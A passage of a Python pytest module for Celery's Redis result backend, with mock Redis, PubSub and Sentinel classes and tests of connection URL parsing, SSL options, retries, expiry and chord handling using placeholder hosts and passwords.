def close(self): self._subscribed_to = set() def 
subscribe(self, *args): self._subscribed_to.update(args) def unsubscribe(self, *args): self._subscribed_to.difference_update(args) def get_message(self, timeout=None): pass class Redis(conftest.MockCallbacks): Connection = Connection Pipeline = Pipeline pubsub = PubSub def __init__(self, host=None, port=None, db=None, password=None, **kw): self.host = host self.port = port self.db = db self.password = password self.keyspace = {} self.expiry = {} self.connection = self.Connection() def get(self, key): return self.keyspace.get(key) def mget(self, keys): return [self.get(key) for key in keys] def setex(self, key, expires, value): self.set(key, value) self.expire(key, expires) def set(self, key, value): self.keyspace[key] = value def expire(self, key, expires): self.expiry[key] = expires return expires def delete(self, key): return bool(self.keyspace.pop(key, None)) def pipeline(self): return self.Pipeline(self) def _get_unsorted_list(self, key): # We simply store the values in append (rpush) order return self.keyspace.setdefault(key, list()) def rpush(self, key, value): self._get_unsorted_list(key).append(value) def lrange(self, key, start, stop): return self._get_unsorted_list(key)[start:stop] def llen(self, key): return len(self._get_unsorted_list(key)) def _get_sorted_set(self, key): # We store 2-tuples of (score, value) and sort after each append (zadd) return self.keyspace.setdefault(key, list()) def zadd(self, key, mapping): # Store elements as 2-tuples with the score first so we can sort it # once the new items have been inserted fake_sorted_set = self._get_sorted_set(key) fake_sorted_set.extend( (score, value) for value, score in mapping.items() ) fake_sorted_set.sort() def zrange(self, key, start, stop): # `stop` is inclusive in Redis so we use `stop + 1` unless that would # cause us to move from negative (right-most) indices to positive stop = stop + 1 if stop != -1 else None return [e[1] for e in self._get_sorted_set(key)[start:stop]] def zrangebyscore(self, key, min_, max_): return [ e[1] for e in self._get_sorted_set(key) if (min_ == "-inf" or e[0] >= min_) and (max_ == "+inf" or e[1] <= max_) ] def zcount(self, key, min_, max_): return len(self.zrangebyscore(key, min_, max_)) class Sentinel(conftest.MockCallbacks): def __init__(self, sentinels, min_other_sentinels=0, sentinel_kwargs=None, **connection_kwargs): self.sentinel_kwargs = sentinel_kwargs self.sentinels = [Redis(hostname, port, **self.sentinel_kwargs) for hostname, port in sentinels] self.min_other_sentinels = min_other_sentinels self.connection_kwargs = connection_kwargs def master_for(self, service_name, redis_class): return random.choice(self.sentinels) class redis: StrictRedis = Redis class ConnectionPool: def __init__(self, **kwargs): pass class UnixDomainSocketConnection: def __init__(self, **kwargs): pass class sentinel: Sentinel = Sentinel class test_RedisResultConsumer: def get_backend(self): from celery.backends.redis import RedisBackend class _RedisBackend(RedisBackend): redis = redis return _RedisBackend(app=self.app) def get_consumer(self): consumer = self.get_backend().result_consumer consumer._connection_errors = (ConnectionError,) return consumer @patch('celery.backends.asynchronous.BaseResultConsumer.on_after_fork') def test_on_after_fork(self, parent_method): consumer = self.get_consumer() consumer.start('none') consumer.on_after_fork() parent_method.assert_called_once() consumer.backend.client.connection_pool.reset.assert_called_once() consumer._pubsub.close.assert_called_once() # PubSub instance not 
initialized - exception would be raised # when calling .close() consumer._pubsub = None parent_method.reset_mock() consumer.backend.client.connection_pool.reset.reset_mock() consumer.on_after_fork() parent_method.assert_called_once() consumer.backend.client.connection_pool.reset.assert_called_once() # Continues on KeyError consumer._pubsub = Mock() consumer._pubsub.close = Mock(side_effect=KeyError) parent_method.reset_mock() consumer.backend.client.connection_pool.reset.reset_mock() consumer.on_after_fork() parent_method.assert_called_once() @patch('celery.backends.redis.ResultConsumer.cancel_for') @patch('celery.backends.asynchronous.BaseResultConsumer.on_state_change') def test_on_state_change(self, parent_method, cancel_for): consumer = self.get_consumer() meta = {'task_id': 'testing', 'status': states.SUCCESS} message = 'hello' consumer.on_state_change(meta, message) parent_method.assert_called_once_with(meta, message) cancel_for.assert_called_once_with(meta['task_id']) # Does not call cancel_for for other states meta = {'task_id': 'testing2', 'status': states.PENDING} parent_method.reset_mock() cancel_for.reset_mock() consumer.on_state_change(meta, message) parent_method.assert_called_once_with(meta, message) cancel_for.assert_not_called() def test_drain_events_before_start(self): consumer = self.get_consumer() # drain_events shouldn't crash when called before start consumer.drain_events(0.001) def test_consume_from_connection_error(self): consumer = self.get_consumer() consumer.start('initial') consumer._pubsub.subscribe.side_effect = (ConnectionError(), None) consumer.consume_from('some-task') assert consumer._pubsub._subscribed_to == {b'celery-task-meta-initial', b'celery-task-meta-some-task'} def test_cancel_for_connection_error(self): consumer = self.get_consumer() consumer.start('initial') consumer._pubsub.unsubscribe.side_effect = ConnectionError() consumer.consume_from('some-task') consumer.cancel_for('some-task') assert consumer._pubsub._subscribed_to == {b'celery-task-meta-initial'} @patch('celery.backends.redis.ResultConsumer.cancel_for') @patch('celery.backends.asynchronous.BaseResultConsumer.on_state_change') def test_drain_events_connection_error(self, parent_on_state_change, cancel_for): meta = {'task_id': 'initial', 'status': states.SUCCESS} consumer = self.get_consumer() consumer.start('initial') consumer.backend._set_with_state(b'celery-task-meta-initial', json.dumps(meta), states.SUCCESS) consumer._pubsub.get_message.side_effect = ConnectionError() consumer.drain_events() parent_on_state_change.assert_called_with(meta, None) assert consumer._pubsub._subscribed_to == {b'celery-task-meta-initial'} def test_drain_events_connection_error_no_patch(self): meta = {'task_id': 'initial', 'status': states.SUCCESS} consumer = self.get_consumer() consumer.start('initial') consumer.backend._set_with_state(b'celery-task-meta-initial', json.dumps(meta), states.SUCCESS) consumer._pubsub.get_message.side_effect = ConnectionError() consumer.drain_events() consumer._pubsub.subscribe.assert_not_called() class basetest_RedisBackend: def get_backend(self): from celery.backends.redis import RedisBackend class _RedisBackend(RedisBackend): redis = redis return _RedisBackend def get_E_LOST(self): from celery.backends.redis import E_LOST return E_LOST def create_task(self, i, group_id="group_id"): tid = uuid() task = Mock(name=f'task-{tid}') task.name = 'foobarbaz' self.app.tasks['foobarbaz'] = task task.request.chord = signature(task) task.request.id = tid self.b.set_chord_size(group_id, 
10) task.request.group = group_id task.request.group_index = i return task @contextmanager def chord_context(self, size=1): with patch('celery.backends.redis.maybe_signature') as ms: request = Mock(name='request') request.id = 'id1' group_id = 'gid1' request.group = group_id request.group_index = None tasks = [ self.create_task(i, group_id=request.group) for i in range(size) ] callback = ms.return_value = Signature('add') callback.id = 'id1' self.b.set_chord_size(group_id, size) callback.delay = Mock(name='callback.delay') yield tasks, request, callback def setup(self): self.Backend = self.get_backend() self.E_LOST = self.get_E_LOST() self.b = self.Backend(app=self.app) class test_RedisBackend(basetest_RedisBackend): @pytest.mark.usefixtures('depends_on_current_app') def test_reduce(self): pytest.importorskip('redis') from celery.backends.redis import RedisBackend x = RedisBackend(app=self.app) assert loads(dumps(x)) def test_no_redis(self): self.Backend.redis = None with pytest.raises(ImproperlyConfigured): self.Backend(app=self.app) def test_username_password_from_redis_conf(self): self.app.conf.redis_password = 'password' x = self.Backend(app=self.app) assert x.connparams assert 'username' not in x.connparams assert x.connparams['password'] == 'password' self.app.conf.redis_username = 'username' x = self.Backend(app=self.app) assert x.connparams assert x.connparams['username'] == 'username' assert x.connparams['password'] == 'password' def test_url(self): self.app.conf.redis_socket_timeout = 30.0 self.app.conf.redis_socket_connect_timeout = 100.0 x = self.Backend( 'redis://:bosco@vandelay.com:123//1', app=self.app, ) assert x.connparams assert x.connparams['host'] == 'vandelay.com' assert x.connparams['db'] == 1 assert x.connparams['port'] == 123 assert x.connparams['password'] == 'bosco' assert x.connparams['socket_timeout'] == 30.0 assert x.connparams['socket_connect_timeout'] == 100.0 assert 'username' not in x.connparams x = self.Backend( 'redis://username:bosco@vandelay.com:123//1', app=self.app, ) assert x.connparams assert x.connparams['host'] == 'vandelay.com' assert x.connparams['db'] == 1 assert x.connparams['port'] == 123 assert x.connparams['username'] == 'username' assert x.connparams['password'] == 'bosco' assert x.connparams['socket_timeout'] == 30.0 assert x.connparams['socket_connect_timeout'] == 100.0 def test_timeouts_in_url_coerced(self): pytest.importorskip('redis') x = self.Backend( ('redis://:bosco@vandelay.com:123//1?' 
'socket_timeout=30&socket_connect_timeout=100'), app=self.app, ) assert x.connparams assert x.connparams['host'] == 'vandelay.com' assert x.connparams['db'] == 1 assert x.connparams['port'] == 123 assert x.connparams['password'] == 'bosco' assert x.connparams['socket_timeout'] == 30 assert x.connparams['socket_connect_timeout'] == 100 def test_socket_url(self): pytest.importorskip('redis') self.app.conf.redis_socket_timeout = 30.0 self.app.conf.redis_socket_connect_timeout = 100.0 x = self.Backend( 'socket:///tmp/redis.sock?virtual_host=/3', app=self.app, ) assert x.connparams assert x.connparams['path'] == '/tmp/redis.sock' assert (x.connparams['connection_class'] is redis.UnixDomainSocketConnection) assert 'host' not in x.connparams assert 'port' not in x.connparams assert x.connparams['socket_timeout'] == 30.0 assert 'socket_connect_timeout' not in x.connparams assert 'socket_keepalive' not in x.connparams assert x.connparams['db'] == 3 def test_backend_ssl(self): pytest.importorskip('redis') self.app.conf.redis_backend_use_ssl = { 'ssl_cert_reqs': ssl.CERT_REQUIRED, 'ssl_ca_certs': '/path/to/ca.crt', 'ssl_certfile': '/path/to/client.crt', 'ssl_keyfile': '/path/to/client.key', } self.app.conf.redis_socket_timeout = 30.0 self.app.conf.redis_socket_connect_timeout = 100.0 x = self.Backend( 'rediss://:bosco@vandelay.com:123//1', app=self.app, ) assert x.connparams assert x.connparams['host'] == 'vandelay.com' assert x.connparams['db'] == 1 assert x.connparams['port'] == 123 assert x.connparams['password'] == 'bosco' assert x.connparams['socket_timeout'] == 30.0 assert x.connparams['socket_connect_timeout'] == 100.0 assert x.connparams['ssl_cert_reqs'] == ssl.CERT_REQUIRED assert x.connparams['ssl_ca_certs'] == '/path/to/ca.crt' assert x.connparams['ssl_certfile'] == '/path/to/client.crt' assert x.connparams['ssl_keyfile'] == '/path/to/client.key' from redis.connection import SSLConnection assert x.connparams['connection_class'] is SSLConnection def test_backend_health_check_interval_ssl(self): pytest.importorskip('redis') self.app.conf.redis_backend_use_ssl = { 'ssl_cert_reqs': ssl.CERT_REQUIRED, 'ssl_ca_certs': '/path/to/ca.crt', 'ssl_certfile': '/path/to/client.crt', 'ssl_keyfile': '/path/to/client.key', } self.app.conf.redis_backend_health_check_interval = 10 x = self.Backend( 'rediss://:bosco@vandelay.com:123//1', app=self.app, ) assert x.connparams assert x.connparams['host'] == 'vandelay.com' assert x.connparams['db'] == 1 assert x.connparams['port'] == 123 assert x.connparams['password'] == 'bosco' assert x.connparams['health_check_interval'] == 10 from redis.connection import SSLConnection assert x.connparams['connection_class'] is SSLConnection def test_backend_health_check_interval(self): pytest.importorskip('redis') self.app.conf.redis_backend_health_check_interval = 10 x = self.Backend( 'redis://vandelay.com:123//1', app=self.app, ) assert x.connparams assert x.connparams['host'] == 'vandelay.com' assert x.connparams['db'] == 1 assert x.connparams['port'] == 123 assert x.connparams['health_check_interval'] == 10 def test_backend_health_check_interval_not_set(self): pytest.importorskip('redis') x = self.Backend( 'redis://vandelay.com:123//1', app=self.app, ) assert x.connparams assert x.connparams['host'] == 'vandelay.com' assert x.connparams['db'] == 1 assert x.connparams['port'] == 123 assert "health_check_interval" not in x.connparams @pytest.mark.parametrize('cert_str', [ "required", "CERT_REQUIRED", ]) def test_backend_ssl_certreq_str(self, cert_str): 
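# --- Illustrative sketch (assumption, not Celery's actual implementation) --
# The assertions in this test expect the backend to normalise strings such
# as "required" or "CERT_REQUIRED" to the matching ``ssl`` module constant.
# One plausible way to express that mapping (the dict name is hypothetical):
_EXAMPLE_CERT_REQS = {
    'none': ssl.CERT_NONE, 'CERT_NONE': ssl.CERT_NONE,
    'optional': ssl.CERT_OPTIONAL, 'CERT_OPTIONAL': ssl.CERT_OPTIONAL,
    'required': ssl.CERT_REQUIRED, 'CERT_REQUIRED': ssl.CERT_REQUIRED,
}
# e.g. _EXAMPLE_CERT_REQS['required'] is ssl.CERT_REQUIRED
# ---------------------------------------------------------------------------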
pytest.importorskip('redis') self.app.conf.redis_backend_use_ssl = { 'ssl_cert_reqs': cert_str, 'ssl_ca_certs': '/path/to/ca.crt', 'ssl_certfile': '/path/to/client.crt', 'ssl_keyfile': '/path/to/client.key', } self.app.conf.redis_socket_timeout = 30.0 self.app.conf.redis_socket_connect_timeout = 100.0 x = self.Backend( 'rediss://:bosco@vandelay.com:123//1', app=self.app, ) assert x.connparams assert x.connparams['host'] == 'vandelay.com' assert x.connparams['db'] == 1 assert x.connparams['port'] == 123 assert x.connparams['password'] == 'bosco' assert x.connparams['socket_timeout'] == 30.0 assert x.connparams['socket_connect_timeout'] == 100.0 assert x.connparams['ssl_cert_reqs'] == ssl.CERT_REQUIRED assert x.connparams['ssl_ca_certs'] == '/path/to/ca.crt' assert x.connparams['ssl_certfile'] == '/path/to/client.crt' assert x.connparams['ssl_keyfile'] == '/path/to/client.key' from redis.connection import SSLConnection assert x.connparams['connection_class'] is SSLConnection @pytest.mark.parametrize('cert_str', [ "required", "CERT_REQUIRED", ]) def test_backend_ssl_url(self, cert_str): pytest.importorskip('redis') self.app.conf.redis_socket_timeout = 30.0 self.app.conf.redis_socket_connect_timeout = 100.0 x = self.Backend( 'rediss://:bosco@vandelay.com:123//1?ssl_cert_reqs=%s' % cert_str, app=self.app, ) assert x.connparams assert x.connparams['host'] == 'vandelay.com' assert x.connparams['db'] == 1 assert x.connparams['port'] == 123 assert x.connparams['password'] == 'bosco' assert x.connparams['socket_timeout'] == 30.0 assert x.connparams['socket_connect_timeout'] == 100.0 assert x.connparams['ssl_cert_reqs'] == ssl.CERT_REQUIRED from redis.connection import SSLConnection assert x.connparams['connection_class'] is SSLConnection @pytest.mark.parametrize('cert_str', [ "none", "CERT_NONE", ]) def test_backend_ssl_url_options(self, cert_str): pytest.importorskip('redis') x = self.Backend( ( 'rediss://:bosco@vandelay.com:123//1' '?ssl_cert_reqs={cert_str}' '&ssl_ca_certs=%2Fvar%2Fssl%2Fmyca.pem' '&ssl_certfile=%2Fvar%2Fssl%2Fredis-server-cert.pem' '&ssl_keyfile=%2Fvar%2Fssl%2Fprivate%2Fworker-key.pem' ).format(cert_str=cert_str), app=self.app, ) assert x.connparams assert x.connparams['host'] == 'vandelay.com' assert x.connparams['db'] == 1 assert x.connparams['port'] == 123 assert x.connparams['password'] == 'bosco' assert x.connparams['ssl_cert_reqs'] == ssl.CERT_NONE assert x.connparams['ssl_ca_certs'] == '/var/ssl/myca.pem' assert x.connparams['ssl_certfile'] == '/var/ssl/redis-server-cert.pem' assert x.connparams['ssl_keyfile'] == '/var/ssl/private/worker-key.pem' @pytest.mark.parametrize('cert_str', [ "optional", "CERT_OPTIONAL", ]) def test_backend_ssl_url_cert_none(self, cert_str): pytest.importorskip('redis') x = self.Backend( 'rediss://:bosco@vandelay.com:123//1?ssl_cert_reqs=%s' % cert_str, app=self.app, ) assert x.connparams assert x.connparams['host'] == 'vandelay.com' assert x.connparams['db'] == 1 assert x.connparams['port'] == 123 assert x.connparams['ssl_cert_reqs'] == ssl.CERT_OPTIONAL from redis.connection import SSLConnection assert x.connparams['connection_class'] is SSLConnection @pytest.mark.parametrize("uri", [ 'rediss://:bosco@vandelay.com:123//1?ssl_cert_reqs=CERT_KITTY_CATS', 'rediss://:bosco@vandelay.com:123//1' ]) def test_backend_ssl_url_invalid(self, uri): pytest.importorskip('redis') with pytest.raises(ValueError): self.Backend( uri, app=self.app, ) def test_conf_raises_KeyError(self): self.app.conf = AttributeDict({ 'result_serializer': 'json', 
'result_cache_max': 1, 'result_expires': None, 'accept_content': ['json'], 'result_accept_content': ['json'], }) self.Backend(app=self.app) @patch('celery.backends.redis.logger') def test_on_connection_error(self, logger): intervals = iter([10, 20, 30]) exc = KeyError() assert self.b.on_connection_error(None, exc, intervals, 1) == 10 logger.error.assert_called_with( self.E_LOST, 1, 'Inf', 'in 10.00 seconds') assert self.b.on_connection_error(10, exc, intervals, 2) == 20 logger.error.assert_called_with(self.E_LOST, 2, 10, 'in 20.00 seconds') assert self.b.on_connection_error(10, exc, intervals, 3) == 30 logger.error.assert_called_with(self.E_LOST, 3, 10, 'in 30.00 seconds') @patch('celery.backends.redis.retry_over_time') def test_retry_policy_conf(self, retry_over_time): self.app.conf.result_backend_transport_options = dict( retry_policy=dict( max_retries=2, interval_start=0, interval_step=0.01, ), ) b = self.Backend(app=self.app) def fn(): return 1 # We don't want to re-test retry_over_time, just check we called it # with the expected args b.ensure(fn, (),) retry_over_time.assert_called_with( fn, b.connection_errors, (), {}, ANY, max_retries=2, interval_start=0, interval_step=0.01, interval_max=1 ) def test_incr(self): self.b.client = Mock(name='client') self.b.incr('foo') self.b.client.incr.assert_called_with('foo') def test_expire(self): self.b.client = Mock(name='client') self.b.expire('foo', 300) self.b.client.expire.assert_called_with('foo', 300) def test_apply_chord(self, unlock='celery.chord_unlock'): self.app.tasks[unlock] = Mock() header_result_args = ( uuid(), [self.app.AsyncResult(x) for x in range(3)], ) self.b.apply_chord(header_result_args, None) assert self.app.tasks[unlock].apply_async.call_count == 0 def test_unpack_chord_result(self): self.b.exception_to_python = Mock(name='etp') decode = Mock(name='decode') exc = KeyError() tup = decode.return_value = (1, 'id1', states.FAILURE, exc) with pytest.raises(ChordError): self.b._unpack_chord_result(tup, decode) decode.assert_called_with(tup) self.b.exception_to_python.assert_called_with(exc) exc = ValueError() tup = decode.return_value = (2, 'id2', states.RETRY, exc) ret = self.b._unpack_chord_result(tup, decode) self.b.exception_to_python.assert_called_with(exc) assert ret is self.b.exception_to_python() def test_on_chord_part_return_no_gid_or_tid(self): request = Mock(name='request') request.id = request.group = request.group_index = None assert self.b.on_chord_part_return(request, 'SUCCESS', 10) is None def test_ConnectionPool(self): self.b.redis = Mock(name='redis') assert self.b._ConnectionPool is None assert self.b.ConnectionPool is self.b.redis.ConnectionPool assert self.b.ConnectionPool is self.b.redis.ConnectionPool def test_expires_defaults_to_config(self): self.app.conf.result_expires = 10 b = self.Backend(expires=None, app=self.app) assert b.expires == 10 def test_expires_is_int(self): b = self.Backend(expires=48, app=self.app) assert b.expires == 48 def test_add_to_chord(self): b = self.Backend('redis://', app=self.app) gid = uuid() b.add_to_chord(gid, 'sig') b.client.incr.assert_called_with(b.get_key_for_group(gid, '.t'), 1) def test_set_chord_size(self): b = self.Backend('redis://', app=self.app) gid = uuid() b.set_chord_size(gid, 10) b.client.set.assert_called_with(b.get_key_for_group(gid, '.s'), 10) def test_expires_is_None(self): b = self.Backend(expires=None, app=self.app) assert b.expires == self.app.conf.result_expires.total_seconds() def test_expires_is_timedelta(self): b = 
self.Backend(expires=timedelta(minutes=1), app=self.app) assert b.expires == 60 def test_mget(self): assert self.b.mget(['a', 'b', 'c']) self.b.client.mget.assert_called_with(['a', 'b', 'c']) def test_set_no_expire(self): self.b.expires = None self.b._set_with_state('foo', 'bar', states.SUCCESS) def test_process_cleanup(self): self.b.process_cleanup() def test_get_set_forget(self): tid = uuid() self.b.store_result(tid, 42, states.SUCCESS) assert self.b.get_state(tid) == states.SUCCESS assert self.b.get_result(tid) == 42 self.b.forget(tid) assert self.b.get_state(tid) == states.PENDING def test_set_expires(self): self.b = self.Backend(expires=512, app=self.app) tid = uuid() key = self.b.get_key_for_task(tid) self.b.store_result(tid, 42, states.SUCCESS) self.b.client.expire.assert_called_with( key, 512, ) def test_set_raises_error_on_large_value(self): with pytest.raises(BackendStoreError): self.b.set('key', 'x' * (self.b._MAX_STR_VALUE_SIZE + 1)) class test_RedisBackend_chords_simple(basetest_RedisBackend): @pytest.fixture(scope="class", autouse=True) def simple_header_result(self): with patch( "celery.result.GroupResult.restore", return_value=None, ) as p: yield p def test_on_chord_part_return(self): tasks = [self.create_task(i) for i in range(10)] random.shuffle(tasks) for i in range(10): self.b.on_chord_part_return(tasks[i].request, states.SUCCESS, i) assert self.b.client.zadd.call_count self.b.client.zadd.reset_mock() assert self.b.client.zrangebyscore.call_count jkey = self.b.get_key_for_group('group_id', '.j') tkey = self.b.get_key_for_group('group_id', '.t') skey = self.b.get_key_for_group('group_id', '.s') self.b.client.delete.assert_has_calls([call(jkey), call(tkey), call(skey)]) self.b.client.expire.assert_has_calls([ call(jkey, 86400), call(tkey, 86400), call(skey, 86400), ]) def test_on_chord_part_return__unordered(self): self.app.conf.result_backend_transport_options = dict( result_chord_ordered=False, ) tasks = [self.create_task(i) for i in range(10)] random.shuffle(tasks) for i in range(10): self.b.on_chord_part_return(tasks[i].request, states.SUCCESS, i) assert self.b.client.rpush.call_count self.b.client.rpush.reset_mock() assert self.b.client.lrange.call_count jkey = self.b.get_key_for_group('group_id', '.j') tkey = self.b.get_key_for_group('group_id', '.t') self.b.client.delete.assert_has_calls([call(jkey), call(tkey)]) self.b.client.expire.assert_has_calls([ call(jkey, 86400), call(tkey, 86400), ]) def test_on_chord_part_return__ordered(self): self.app.conf.result_backend_transport_options = dict( result_chord_ordered=True, ) tasks = [self.create_task(i) for i in range(10)] random.shuffle(tasks) for i in range(10): self.b.on_chord_part_return(tasks[i].request, states.SUCCESS, i) assert self.b.client.zadd.call_count self.b.client.zadd.reset_mock() assert self.b.client.zrangebyscore.call_count jkey = self.b.get_key_for_group('group_id', '.j') tkey = self.b.get_key_for_group('group_id', '.t') self.b.client.delete.assert_has_calls([call(jkey), call(tkey)]) self.b.client.expire.assert_has_calls([ call(jkey, 86400), call(tkey, 86400), ]) def test_on_chord_part_return_no_expiry(self): old_expires = self.b.expires self.b.expires = None tasks = [self.create_task(i) for i in range(10)] self.b.set_chord_size('group_id', 10) for i in range(10): self.b.on_chord_part_return(tasks[i].request, states.SUCCESS, i) assert self.b.client.zadd.call_count self.b.client.zadd.reset_mock() assert self.b.client.zrangebyscore.call_count jkey = self.b.get_key_for_group('group_id', '.j') tkey = 
self.b.get_key_for_group('group_id', '.t') self.b.client.delete.assert_has_calls([call(jkey), call(tkey)]) self.b.client.expire.assert_not_called() self.b.expires = old_expires def test_on_chord_part_return_expire_set_to_zero(self): old_expires = self.b.expires self.b.expires = 0 tasks = [self.create_task(i) for i in range(10)] for i in range(10): self.b.on_chord_part_return(tasks[i].request, states.SUCCESS, i) assert self.b.client.zadd.call_count self.b.client.zadd.reset_mock() assert self.b.client.zrangebyscore.call_count jkey = self.b.get_key_for_group('group_id', '.j') tkey = self.b.get_key_for_group('group_id', '.t') self.b.client.delete.assert_has_calls([call(jkey), call(tkey)]) self.b.client.expire.assert_not_called() self.b.expires = old_expires def test_on_chord_part_return_no_expiry__unordered(self): self.app.conf.result_backend_transport_options = dict( result_chord_ordered=False, ) old_expires = self.b.expires self.b.expires = None tasks = [self.create_task(i) for i in range(10)] for i in range(10): self.b.on_chord_part_return(tasks[i].request, states.SUCCESS, i) assert self.b.client.rpush.call_count self.b.client.rpush.reset_mock() assert self.b.client.lrange.call_count jkey = self.b.get_key_for_group('group_id', '.j') tkey = self.b.get_key_for_group('group_id', '.t') self.b.client.delete.assert_has_calls([call(jkey), call(tkey)]) self.b.client.expire.assert_not_called() self.b.expires = old_expires def test_on_chord_part_return_no_expiry__ordered(self): self.app.conf.result_backend_transport_options = dict( result_chord_ordered=True, ) old_expires = self.b.expires self.b.expires = None tasks = [self.create_task(i) for i in range(10)] for i in range(10): self.b.on_chord_part_return(tasks[i].request, states.SUCCESS, i) assert self.b.client.zadd.call_count self.b.client.zadd.reset_mock() assert self.b.client.zrangebyscore.call_count jkey = self.b.get_key_for_group('group_id', '.j') tkey = self.b.get_key_for_group('group_id', '.t') self.b.client.delete.assert_has_calls([call(jkey), call(tkey)]) self.b.client.expire.assert_not_called() self.b.expires = old_expires def test_on_chord_part_return__success(self): with self.chord_context(2) as (_, request, callback): self.b.on_chord_part_return(request, states.SUCCESS, 10) callback.delay.assert_not_called() self.b.on_chord_part_return(request, states.SUCCESS, 20) callback.delay.assert_called_with([10, 20]) def test_on_chord_part_return__success__unordered(self): self.app.conf.result_backend_transport_options = dict( result_chord_ordered=False, ) with self.chord_context(2) as (_, request, callback): self.b.on_chord_part_return(request, states.SUCCESS, 10) callback.delay.assert_not_called() self.b.on_chord_part_return(request, states.SUCCESS, 20) callback.delay.assert_called_with([10, 20]) def test_on_chord_part_return__success__ordered(self): self.app.conf.result_backend_transport_options = dict( result_chord_ordered=True, ) with self.chord_context(2) as (_, request, callback): self.b.on_chord_part_return(request, states.SUCCESS, 10) callback.delay.assert_not_called() self.b.on_chord_part_return(request, states.SUCCESS, 20) callback.delay.assert_called_with([10, 20]) def test_on_chord_part_return__callback_raises(self): with self.chord_context(1) as (_, request, callback): callback.delay.side_effect = KeyError(10) task = self.app._tasks['add'] = Mock(name='add_task') self.b.on_chord_part_return(request, states.SUCCESS, 10) task.backend.fail_from_current_stack.assert_called_with( callback.id, exc=ANY, ) def 
test_on_chord_part_return__callback_raises__unordered(self): self.app.conf.result_backend_transport_options = dict( result_chord_ordered=False, ) with self.chord_context(1) as (_, request, callback): callback.delay.side_effect = KeyError(10) task = self.app._tasks['add'] = Mock(name='add_task') self.b.on_chord_part_return(request, states.SUCCESS, 10) task.backend.fail_from_current_stack.assert_called_with( callback.id, exc=ANY, ) def test_on_chord_part_return__callback_raises__ordered(self): self.app.conf.result_backend_transport_options = dict( result_chord_ordered=True, ) with self.chord_context(1) as (_, request, callback): callback.delay.side_effect = KeyError(10) task = self.app._tasks['add'] = Mock(name='add_task') self.b.on_chord_part_return(request, states.SUCCESS, 10) task.backend.fail_from_current_stack.assert_called_with( callback.id, exc=ANY, ) def test_on_chord_part_return__ChordError(self): with self.chord_context(1) as (_, request, callback): self.b.client.pipeline = ContextMock() raise_on_second_call(self.b.client.pipeline, ChordError()) self.b.client.pipeline.return_value.zadd().zcount().get().get().expire( ).expire().expire().execute.return_value = (1, 1, 0, b'1', 4, 5, 6) task = self.app._tasks['add'] = Mock(name='add_task') self.b.on_chord_part_return(request, states.SUCCESS, 10) task.backend.fail_from_current_stack.assert_called_with( callback.id, exc=ANY, ) def test_on_chord_part_return__ChordError__unordered(self): self.app.conf.result_backend_transport_options = dict( result_chord_ordered=False, ) with self.chord_context(1) as (_, request, callback): self.b.client.pipeline = ContextMock() raise_on_second_call(self.b.client.pipeline, ChordError()) self.b.client.pipeline.return_value.rpush().llen().get().get().expire( ).expire().expire().execute.return_value = (1, 1, 0, b'1', 4, 5, 6) task = self.app._tasks['add'] = Mock(name='add_task') self.b.on_chord_part_return(request, states.SUCCESS, 10) task.backend.fail_from_current_stack.assert_called_with( callback.id, exc=ANY, ) def test_on_chord_part_return__ChordError__ordered(self): self.app.conf.result_backend_transport_options = dict( result_chord_ordered=True, ) with self.chord_context(1) as (_, request, callback): self.b.client.pipeline = ContextMock() raise_on_second_call(self.b.client.pipeline, ChordError()) self.b.client.pipeline.return_value.zadd().zcount().get().get().expire( ).expire().expire().execute.return_value = (1, 1, 0, b'1', 4, 5, 6) task = self.app._tasks['add'] = Mock(name='add_task') self.b.on_chord_part_return(request, states.SUCCESS, 10) task.backend.fail_from_current_stack.assert_called_with( callback.id, exc=ANY, ) def test_on_chord_part_return__other_error(self): with self.chord_context(1) as (_, request, callback): self.b.client.pipeline = ContextMock() raise_on_second_call(self.b.client.pipeline, RuntimeError()) self.b.client.pipeline.return_value.zadd().zcount().get().get().expire( ).expire().expire().execute.return_value = (1, 1, 0, b'1', 4, 5, 6) task = self.app._tasks['add'] = Mock(name='add_task') self.b.on_chord_part_return(request, states.SUCCESS, 10) task.backend.fail_from_current_stack.assert_called_with( callback.id, exc=ANY, ) def test_on_chord_part_return__other_error__unordered(self): self.app.conf.result_backend_transport_options = dict( result_chord_ordered=False, ) with self.chord_context(1) as (_, request, callback): self.b.client.pipeline = ContextMock() raise_on_second_call(self.b.client.pipeline, RuntimeError()) 
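# --- Illustrative sketch (not part of the original test) -------------------
# ``raise_on_second_call`` (defined near the top of this module) arms a mock
# so that its first call succeeds and every later call raises.  A minimal,
# self-contained demonstration of that behaviour; the helper name below is
# hypothetical:
def _demo_raise_on_second_call():
    client = Mock(name='client')
    raise_on_second_call(client, RuntimeError(), 'first-result')
    assert client() == 'first-result'   # first call returns the given value
    try:
        client()                        # second call raises the exception
    except RuntimeError:
        return True
    return False
# ---------------------------------------------------------------------------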
self.b.client.pipeline.return_value.rpush().llen().get().get().expire( ).expire().expire().execute.return_value = (1, 1, 0, b'1', 4, 5, 6) task = self.app._tasks['add'] = Mock(name='add_task') self.b.on_chord_part_return(request, states.SUCCESS, 10) task.backend.fail_from_current_stack.assert_called_with( callback.id, exc=ANY, ) def test_on_chord_part_return__other_error__ordered(self): self.app.conf.result_backend_transport_options = dict( result_chord_ordered=True, ) with self.chord_context(1) as (_, request, callback): self.b.client.pipeline = ContextMock() raise_on_second_call(self.b.client.pipeline, RuntimeError()) self.b.client.pipeline.return_value.zadd().zcount().get().get().expire( ).expire().expire().execute.return_value = (1, 1, 0, b'1', 4, 5, 6) task = self.app._tasks['add'] = Mock(name='add_task') self.b.on_chord_part_return(request, states.SUCCESS, 10) task.backend.fail_from_current_stack.assert_called_with( callback.id, exc=ANY, ) class test_RedisBackend_chords_complex(basetest_RedisBackend): @pytest.fixture(scope="function", autouse=True) def complex_header_result(self): with patch("celery.result.GroupResult.restore") as p: yield p @pytest.mark.parametrize(['results', 'assert_save_called'], [ # No results in the header at all - won't call `save()` (tuple(), False), # Simple results in the header - won't call `save()` ((AsyncResult("foo"), ), False), # Many simple results in the header - won't call `save()` ((AsyncResult("foo"), ) * 42, False), # A single complex result in the header - will call `save()` ((GroupResult("foo", []),), True), # Many complex results in the header - will call `save()` ((GroupResult("foo"), ) * 42, True), # Mixed simple and complex results in the header - will call `save()` (itertools.islice( itertools.cycle(( AsyncResult("foo"), GroupResult("foo"), )), 42, ), True), ]) def test_apply_chord_complex_header(self, results, assert_save_called): mock_group_result = Mock() mock_group_result.return_value.results = results self.app.GroupResult = mock_group_result header_result_args = ("gid11", results) self.b.apply_chord(header_result_args, None) if assert_save_called: mock_group_result.return_value.save.assert_called_once_with(backend=self.b) else: mock_group_result.return_value.save.assert_not_called() def 